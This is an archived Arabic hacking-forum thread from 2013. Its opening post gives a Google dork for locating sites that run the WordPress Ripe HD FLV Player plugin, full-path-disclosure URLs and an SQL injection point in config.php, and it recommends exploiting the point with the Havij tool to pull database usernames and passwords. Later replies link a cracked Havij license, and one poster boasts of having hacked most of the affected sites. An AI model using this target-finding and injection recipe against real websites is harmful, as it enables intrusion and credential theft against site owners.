ثغرة Wordpress 2013 [الأرشيف] - منتديات جيوش الهكرز

مشاهدة النسخة كاملة : ثغرة Wordpress 2013

rakan-2011

02-14-2013, 06:16 PM

السلام عليكم وورحمة الله وبركاته ..

كيفكم حبايبي . (http://www.root-ps.com)

ان شاء الله بخير.

الدورك => inurl:"/wp-content/plugins/ripe-hd-player/ (www.root-ps.com)"

https://www.google.com.sa/search?hl=ar&tbo=d&site=&source=hp&q=inurl%3A%22%2Fwp-content%2Fplugins%2Fripe-hd-player&oq=inurl%3A%22%2Fwp-content%2Fplugins%2Fripe-hd-player&gs_l=hp.3...1721.1721.0.2168.1.1.0.0.0.0.339.339.3-1.1.0...0.0...1c.1.an4IZIVBLMI

الستغلال

# يمكن للمهاجم الوصول إلى قاعدة البيانات والحصول على اسم المستخدم وكلمة المرور ....... وكشف المسار الكامل

1#=> المسار الكامل :

http://[target]/[path]/wp-content/plugins/ripe-hd-player/index.php
http://[target]/[path]/wp-content/plugins/ripe-hd-player/installer.php

-------
2#=> حقن SQL

http://[target]/ (http://www.root-ps.com)[path]/wp-content/plugins/ripe-hd-player/config.php?id=2'[inj3ct h3re]

الاستغلال (http://www.root-ps.com) عبر برنامج Havij .

او يدوي

بتوفيق للجميع

Iraqe Hacker

02-14-2013, 06:22 PM

جزاك الله خيرا صديقي

Mr.JnOoN

02-14-2013, 06:22 PM

شكرا لك
بالتوفيق

rakan-2011

02-14-2013, 06:28 PM

جزاك الله خيرا صديقي

وياك يلغلا ان شاء الله .

شكرا لك
بالتوفيق

العفو ياالغلا .

She!! Access

02-14-2013, 06:37 PM

وجب التنويه إلى أن الثغرة غير موجودة في برنامج WordPress. الثغرة موجودة في إحدى الإضافات الخاصة بالبرنامج والتي تدعى WordPress Ripe HD FLV Player.
أي أن المواقع التي لم تقم بتركيب الإضافة غير مصابة بالثغرة.
أشكرك أخ راكان على الموضوع

اعمل معروف333

02-14-2013, 07:27 PM

الشكر الجزيل لك
http://www.imageguru.org/files/img/display/imagedisplay_qfw3oanqwes.gif.php

مطفوق

02-15-2013, 02:24 PM

مشششششششششششششششششكور لأكن تكفى ابي برنامج هافج كامل 1.15 لأكنت ي بعدي

rakan-2011

02-15-2013, 03:11 PM

مشششششششششششششششششكور لأكن تكفى ابي برنامج هافج كامل 1.15 لأكنت ي بعدي

http://localhostr.com/jjewl0xxtFga

لتفعيل : HavijKey.lic (www.root-ps.com)

[email protected] (www.root-ps.com)

بتوفيق

uuser54822

02-26-2013, 02:15 AM

بارك الله فيك يا غالي

LORDOFDARKNES

03-06-2013, 04:29 AM

راح تلاقي اغلب المواقع انا مهكرها خخخخخخخ

bibs2091

03-07-2013, 01:15 PM

ما فهمت كويز

samir123

05-09-2013, 01:57 PM

اخي انا مفهمت ممكن شرح يكون فديو احسن بارك الله فيك

aymen cyril kamar

05-09-2013, 11:39 PM

مشكور حبيبي تياتي

kamelm33

05-11-2013, 11:58 AM

شكرااااااااا

haker.abode

05-30-2013, 12:27 AM

نخرب بيت شركة Wordpress هههههههه

b!àz!k

05-30-2013, 03:25 AM

بارك الله فيك يا غالي

flashmen

06-04-2013, 02:16 PM

إشهار لمنتدى.. مخالف

http://localhostr.com/jjewl0xxtFga

لتفعيل : HavijKey.lic (www.root-ps.com)

[email protected] (www.root-ps.com)

بتوفيق

Ahmed Egy Hack

07-01-2013, 08:53 PM

شكراااااا ....